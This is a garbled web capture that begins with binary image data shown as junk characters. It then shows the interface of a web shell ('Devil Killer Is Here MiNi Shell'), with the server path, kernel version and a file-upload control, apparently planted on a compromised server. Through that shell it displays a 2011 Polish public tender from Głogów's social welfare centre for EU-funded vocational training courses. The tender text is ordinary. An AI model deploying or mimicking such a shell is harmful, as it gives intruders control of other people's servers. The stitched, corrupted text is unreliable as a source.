JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110606/145632-N-2011.html

<p class="kh_header"><b>Głogów: Organizacja kursów dla 
uczestników projektu Aktywni i Efektywni
współfinansowanego przez Unię Europejską 
w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 145632 - 2011; data zamieszczenia: 06.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. gen. Wł. Sikorskiego 4, 67-200 Głogów, woj. dolnośląskie, tel. 076 7276500, faks 076 7276501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.glogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kursów dla 
uczestników projektu Aktywni i Efektywni
współfinansowanego przez Unię Europejską 
w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie następujących szkoleń:

1. Organizacja i przeprowadzenie kursu Kurs - pomoc kuchenna (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 5 osób. Powinno odbyć się w ciągu min. 150 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- zagadnienia teoretyczne związane z nauką zawodu, m.in.
organizacja stanowiska pracy, 
podstawowe zasady żywienia,
posługiwanie się narzędziami, maszynami i urządzeniami przy przygotowywaniu potraw i napojów,
prowadzenie obróbki wstępnej surowców, 
wykonywanie rożnymi technikami i metodami zgodnie z normami surowcowymi asortymentów potraw, 
wykończenie, porcjowanie, dekorowanie i estetyczne wydanie wyrobów kulinarnych, 
czynności porządkowe w kuchni,
HAACAP, 
minimum sanitarne,
przepisy BHP i ppoż.,
obsługa kas fiskalnych.
- zajęcia praktyczne.

2. Organizacja i przeprowadzenie kursu dwumodułowego - Kurs dwumodułowy - opiekunka osób starszych, niepełnosprawnych i dzieci (badania lekarskie + wykłady + praktyka w co najmniej dwóch miejscach + egzamin końcowy): 

A. I moduł - Kurs opiekunki osób starszych, niepełnosprawnych i dzieci dla 11 osób, który powinien odbyć się w ciągu min. 140 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- zajęcia teoretyczne:
-podstawy gerontologii i informacji na temat osób niepełnosprawnych,
-podstawy psychologii, w tym komunikacja i mediacje,
-zachowanie osób chorych z wybranymi schorzeniami; choroby Parkinsona, Alzhaimera, demencje starcze, zaburzenia psychiczne,
-podstawy higieny i pielęgnacji,
-podstawy rehabilitacji i aktywizacji, 
-opieka w domu pacjenta,
-metodyka organizacji czasu wolnego dla osób starszych i niepełnosprawnych,
-elementy fizjologii i patologii wieku dziecięcego, 
-zasady pielęgnacji dzieci,
-zasady aktywizacji dzieci - gry i zabawy,
-ustalanie warunków pracy z pracodawcą oraz współpracy z podopiecznym i jego rodziną,
-nowe przepisy dot. opieki nad dziećmi w wieku do lat 3,
-zasady udzielania pierwszej pomocy przedmedycznej,
-higiena żywienia - diety,
-przepisy bhp i ppoż.
- zajęcia praktyczne w odpowiednich placówkach.

B.  II moduł - Kurs masażu klasycznego dla 11 osób który powinien odbyć się w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
a)anatomia człowieka,
b)wprowadzenie do masażu - zagadnienia teoretyczne obejmujące:
- techniki masażu i ich oddziaływanie,
- wskazania i przeciwwskazania do masażu,
- wpływ masażu na organizm człowieka,
- metodyka stosowania masażu,
- techniki masażu.
c)część praktyczna I (masaż poszczególnych części ciała):
- masaż kończyny górnej, 
- kończyny dolnej,
- masaż grzbietu,
- kręgosłupa,
- karku i obręczy barkowej,
- klatki piersiowej,
- powłok brzusznych.
d)część praktyczna II:
- masaż całego ciała.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę. Uczestnikami modułu I i II będą te same osoby/uczestnicy.

3.Organizacja i przeprowadzenie kursu dwumodułowego - Kurs dwumodułowy - magazynier

A.I moduł - Kurs magazyniera (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 5 osób, które powinno odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się 
z następujących bloków tematycznych:
- organizacja prac magazynowych,
- technologie prac magazynowych,
- wiadomości z zakresu obrotu magazynowego,
- zabezpieczenie towarów,
- minimum sanitarne,
- przepisy bhp i ppoż,
- obsługa kas fiskalnych,
- obsługa programu Subiekt,
B.II moduł - Organizacja i przeprowadzenie Kursu operatora wózka widłowego wszystkich typów (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 5 osób, które winno odbyć się w ciągu min. 67 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- zajęcia teoretyczne (m.in.):
typy wózków jezdniowych, 
budowa i zasady działania wózków jezdniowych różnych typów pozwalające na ich prawidłową eksploatację, 
czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami,
czynności operatora w czasie pracy wózkami, 
warunki towaroznawstwa, 
wiadomości z bhp i wybrane przepisy ruchu drogowego, 
bezpieczna wymiana butli gazowych w wózkach jezdniowych, 
wiadomości o dozorze technicznym.
- zajęcia praktyczne.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę. Uczestnikami modułów będą te same osoby/uczestnicy.


4. Organizacja i przeprowadzenie kursu Kurs - bukieciarz florysta (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 2 osób, które winno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych (teoretycznych i praktycznych):
- anatomia i fizjologia roślin,
- asortyment roślin ozdobnych,
- narzędzia i środki techniczne, w tym sposoby utrwalania materiału roślinnego,
- podstawowe zasady wykonywania kompozycji,
- florystyka ślubna,
- florystyka żałobna,
- florystyka okolicznościowa,
- kompozycje z roślin suchych i preparowanych,
- obsługa kas fiskalnych,
- obsługa terminala kart płatniczych,
- przepisy bhp i ppoż.

5. Organizacja i przeprowadzenie kursu Kurs - kadry, płace i obsługa biura (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- wybrane zagadnienia z prawa pracy, cywilnego i postępowania administracyjnego,
- dokumentacja kadrowa,
- czynności związane z zatrudnianiem pracowników,
- zasady urlopowe,
- czas pracy,
- dokumentacja płacowa; lista płac, karty wynagrodzeń;
- zasad naliczania płac, rozliczanie z ZUS i US,
- świadczenia na rzecz pracowników z ubezpieczenia społecznego,
- fundusz pracy i gwarantowanych świadczeń pracowniczych
- obsługa programów kadrowych, m.in. PŁATNIK, REWIZOR, SIGID LUB PERSON, PORTAL SPRAWOZDAWCZY GUS,
- organizacja biura i prowadzenie dokumentacji,
- wykorzystywanie pakietu Office w pracach biurowych,
- autoprezentacja,
- zasady i przepisy BHP w biurze firmy.

6. Organizacja i przeprowadzenie kursu Kurs prawa jazdy kat. B (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 10 osób powinno odbyć się w ciągu min. 60  godzin zegarowych i składać się z następujących bloków tematycznych:
- szkolenie teoretyczne,
- szkolenie praktyczne. 
UWAGA! Na cenę kursu składać się będą: badania lekarskie, nauka jazdy, koszty egzaminu teoretycznego 
i praktycznego,  w tym jeden poprawkowy praktyczny.
                   
7. Organizacja i przeprowadzenie kursu Kurs - profesjonalny sprzedawca (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 11 osób powinno odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-podstawowe pojęcia ekonomiczne,
-instrumenty marketingu,
-fakturowanie,
-psychologia sprzedaży,
-kultura obsługi klienta,
-podstawy obsługi komputera,
-program Subiekt,
-obsługa kas fiskalnych,
-obsługa terminala kas fiskalnych,
-minimum sanitarne,
-przepisy bhp i ppoż.

8. Organizacja i przeprowadzenie kursu Kurs malowania i szpachlowania (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 1 osoby powinno odbyć się w ciągu min. 130 godzin, w tym 20 godzin teoretycznych i 110 godzin praktycznych (45 minut każda) i składać się z następujących bloków tematycznych (teoretycznego i praktycznego):
-organizacji stanowiska pracy, 
-materiałoznawstwo, 
-przygotowanie powierzchni do malowania i szpachlowania oraz metod aplikacji, technologii prac malarskich i kładzenia gładzi szpachlowej,
-przechowywanie farb i materiałów malarskich, odpadów i ochrony środowiska,
-przepisy BHP i ppoż,
-zajęć praktycznych.

9. Organizacja i przeprowadzenie kursu Kurs - samodzielny księgowy bilansista (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 160 godzin lekcyjnych (45 minut każda).
Kurs składać się powinien z następujących bloków tematycznych:
1. Aktualne zagadnienia obejmujące wiedzę i umiejętności praktyczne z zakresu księgowości, w tym:
- ogólne zasady rachunkowości, 
- krajowe i zagraniczne środki pieniężne, kredyty bankowe i inne krótkoterminowe aktywa finansowe,
- klasyfikacja i ewidencja rozrachunków:
z odbiorcami i dostawcami krajowymi i zagranicznymi,
publiczno - prawne ( z budżetem, ZUS, Urzędem Celnym, itp.),
z pracownikami z tytułu wynagrodzeń,
pozostałe rozrachunki,
        - materiały i towary (rozliczenie zakupu),
        - aktywa trwałe (rzeczowe i finansowe, inwestycje długoterminowe, leasing),
        - koszty podstawowej działalności operacyjnej (rozliczenia międzyokresowe, kalkulacja jednostkowa),
        - wyroby gotowe,
        - przychody ze sprzedaży i koszty ich uzyskania,
        - przychody i koszty finansowe,
        - zyski i straty nadzwyczajne,
        - kapitały, rezerwy, rozliczenia międzyokresowe przychodów,
        - ustalanie wyniku finansowego (wynik podatkowy, rezerwy i aktywa z tytułu odroczonego podatku dochodowego),
        - naliczanie podatków i ZUS - sporządzanie deklaracji,
        - konstrukcja i zasady sporządzania bilansu oraz rachunku zysków i strat,
        - sprawozdania finansowe.
2. Obsługa komputera w pracy samodzielnego księgowego, w tym: 
- obsługa komputera w zakresie podstawowym (środowisko Windows, Pakiet Microsoft Office, Internet); 
- arkusze kalkulacyjne w zastosowaniach finansowo-księgowych; 
- obsługa programów placowych i programów komputerowych finansowo-księgowych (minimum dwa programy finansowo-księgowe i jeden program placowy - często stosowane przez firmy z sektora MSP oraz jednostki budżetowe) oraz obsługa programu Płatnik.

3. Zajęcia praktyczne na zasadzie firmy symulacyjnej prowadzone przez instruktorów - specjalistów w danej dziedzinie.

Dodatkowe informacje/uwagi:
- termin przeprowadzenia kursów (zajęcia teoretyczne i praktyczne) - wrzesień - listopad 2011r., dokładny harmonogram musi być uzgodniony z Zamawiającym,
- Wykonawca zobowiązany jest zapewnić salę wyposażoną w multimedia, materiały edukacyjne, catering w formie baru kawowego (kawa, herbata, woda mineralna, ciastka) oraz zajęcia praktyczne w uzgodnionych z Zamawiającym miejscach,
- Zamawiający zastrzega sobie prawo zmiany liczby osób (uczestników szkolenia) do +/- 20%,
- Zamawiający wymaga, aby zajęcia były przeprowadzone na terenie miasta Głogowa,
- Zamawiający wymaga opracowania i prowadzenia dokumentacji przebiegu kursu, tj.: 
-konspektu zajęć zawierającego tematy zajęć edukacyjnych i wymiar godzin;
-dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin 
i tematy zajęć edukacyjnych,
-listy obecności;
-wydania zaświadczeń i innych dokumentów potwierdzających ukończenie kursu, 
w tym sporządzenia rejestru wydanych zaświadczeń lub innych dokumentów,
-przekazania Zamawiającemu listy obecności beneficjentów nie później niż do 3-go dnia po zakończeniu kursu,
- Wykonawca zobowiązany jest do:
-niezwłocznego informowania Zamawiającego o każdej zmianie organizacyjnej dotyczącej harmonogramu zajęć, w tym telefonicznego informowania o nieobecności w kursie uczestnika jeszcze w tym samym dniu, w którym miała miejsce nieobecność,
-pisemnego poinformowania zamawiającego o nieukończeniu kursu przez osoby szkolone wraz z podaniem przyczyny, w terminie do 3-go dnia po upływie planowanego terminu kursu,
-dostarczenia osobom szkolonym ankiet ewaluacyjnych (ex-ante i ex - post) otrzymanych od Zamawiającego i po wypełnieniu ankiet przez osoby szkolone przekazanie ich Zamawiającemu w terminie 3 dni po rozpoczęciu i po planowym zakończeniu kursu,
-oznakowania materiałów szkoleniowych, prezentacji multimedialnych i sal wykładowych poprzez umieszczenie logotypów unijnych zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL (4 luty 2009) dostępnych na stronie internetowej www.efs.gov.pl i logo Projektu dostarczonego przez Zamawiającego,
-sporządzenia sprawozdania z przebiegu zajęć zgodnie z otrzymanym wzorem od Zamawiającego,
-dokonania wpisu lub jego aktualizacji w internetowym rejestrze instytucji szkoleniowych (RIS) prowadzonym przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (podstawa prawna art. 20 ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz § 4 ust. 1 Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 października 2004 r.) przed złożeniem oferty na powyższy przetarg,
-przeprowadzenie badań lekarskich, stwierdzających zdolność do odbycia kursu oraz wydanie książeczek zdrowia o ile przepisy odrębne tego wymagają,
-ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie kursu oraz w drodze na kurs i z kursu, zgodnie ze Wskazaniem na skierowaniu,
-Przeprowadzenie egzaminu wewnętrznego z zakresu programu zagadnień.
-Zapewnienie uczestnikom kursu materiałów szkoleniowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podst. art. 67 ust. 1 pkt 6 ustawy pzp, do wysokości nie więcej niż  do 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie żąda wniesienia wadium w postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowego sposobu dokonywania oceny spełniania warunków udziału w  postępowaniu o których mowa w art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowego sposobu dokonywania oceny spełniania warunków udziału w  postępowaniu o których mowa w art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowego sposobu dokonywania oceny spełniania warunków udziału w  postępowaniu o których mowa w art. 22 
ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowego sposobu dokonywania oceny spełniania warunków udziału w  postępowaniu o których mowa w art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowego sposobu dokonywania oceny spełniania warunków udziału w  postępowaniu o których mowa w art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych dopuszcza możliwość (z uwzględnieniem art. 140) wydłużenia terminu wykonania umowy ze względu na:
-opóźnienia zawinione przez Zamawiającego,
-działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mające bezpośredni wpływ na terminowość wykonywania usługi,
-wystąpienie zamówień uzupełniających,
-wystąpienie okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych dopuszcza możliwość  wprowadzenia zmian w umowie korzystnych dla Zamawiającego, polegających na możliwości zmniejszenia wynagrodzenia Wykonawcy, w sytuacji zmniejszenia ilości osób, które będą brały udział w  konkretnym kursie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.glogow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej  w Głogowie ul. Sikorskiego 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2011 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej  w Głogowie ul. Sikorskiego 4, sekretariat, pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne dotyczy realizacji projektu Pt.: Aktywni i Efektywni współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013- poddziałanie 7.1.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu Kurs - pomoc kuchenna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu Kurs - pomoc kuchenna (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 5 osób. Powinno odbyć się w ciągu min. 150 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- zagadnienia teoretyczne związane z nauką zawodu, m.in.
organizacja stanowiska pracy, 
podstawowe zasady żywienia,
posługiwanie się narzędziami, maszynami i urządzeniami przy przygotowywaniu potraw i napojów,
prowadzenie obróbki wstępnej surowców, 
wykonywanie rożnymi technikami i metodami zgodnie z normami surowcowymi asortymentów potraw, 
wykończenie, porcjowanie, dekorowanie i estetyczne wydanie wyrobów kulinarnych, 
czynności porządkowe w kuchni,
HAACAP, 
minimum sanitarne,
przepisy BHP i ppoż.,
obsługa kas fiskalnych.
- zajęcia praktyczne..</p></li>
